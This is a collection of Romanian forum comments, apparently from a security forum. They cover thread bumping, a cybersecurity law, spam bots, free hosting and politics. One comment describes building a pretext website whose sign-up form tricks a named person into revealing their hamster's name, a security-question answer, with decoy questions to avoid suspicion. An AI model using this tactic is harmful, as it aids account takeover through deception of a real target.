Nu ar fi chiar ok. Sa presupunem ca eu "vand un site" si nu am reusit sa-l vand in timp de 2 saptamani, s-au acumulat deja multe posturi iar al meu nu se mai vede. In prezent se foloseste "UP" daca s-ar intampla chestia asta topicul ar ramane uitat, plus ca o sa le vina idee baietilor sa isi faca conturi pentru com: Gen: Contul meu e Grigore postez ceva si dupa 2 saptamani fac cont Adrian si postez "Mai e valabila oferta?" ar fi aiurea.

Cum ai putea sa afli tu numele hamsterului cu ajutorul unui backdoor? doar nu are numele hamsterului prin pc sau daca e pus pe login nu are parola:

Cum s-a discutat si https://rstforums.com/forum/94054-legea-securit-ii-cibernetice-votat-de-ale-i-sri-acces-la-calculatoarele-perso.rst <- nu e nimic nou si nu s-a schimbat nimic si nu o sa se schimbe nimic, asta e doar o formalitate... e doar ceva "official" chestia asta se intampla de mult timp.

Ba da voi nu observati ca e doar un bot de spam?

Cum a spus si @iam60 si daca are un hamster, un iepure, un caine si o pisica de unde stii ca e numele hamsterulului? o varianta ar fi sa pui 3 intrebari. -Numele mamei -Care e animalul tau preferat ( dintre animalele pe care le ai) -Numele animalului tau (aici e tot la noroc... ) o varianta ar fi sa fie ceva targetat pe hamsterul lui Viorel si site-ul sa se bazeze pe hamsteri... cum am prezentat eu mai sus. si la inregistrare pui: - Care este nimele hamsterului tau : - De cat timp il ai? - Ce ii place sa manance (nu poti pune doar o intrebare fiindca ar da de banuit)

http://www.000webhost.com/ http://www.freewebhostingarea.com/ http://www.weebly.com/features/#!/free-web-hosting https://byethost.com/free-web-hosting http://5gbfree.com/ http://www.freehostia.com/index2.html http://haphost.com/ https://www.x-o.ro/ https://www.freehosting.com/ faza e ca tu vrei si free si bun daca nu vreti sa da-ti bani incetati cu mofturile...

Frate de 25 de ani ( de la revolutie ) nu s-a schimbat nimic in Romania si nu se va schimba, smecheriile se fac deja pe la spatele "fraierilor" stai tu linistit ca nu o sa iti ceara nimeni parerea sau sa te intrebe daca "ti se pare corect" Intelege ca peste tot e la fel ( adica comunism ). E ca si cum ai lua o sticla de cola si i-ai pune eticheta "Pepsi" acelasi lucru a fost si cu revolutia, totusi sa nu o dam in astfel de discutii dintr-o stire de genu...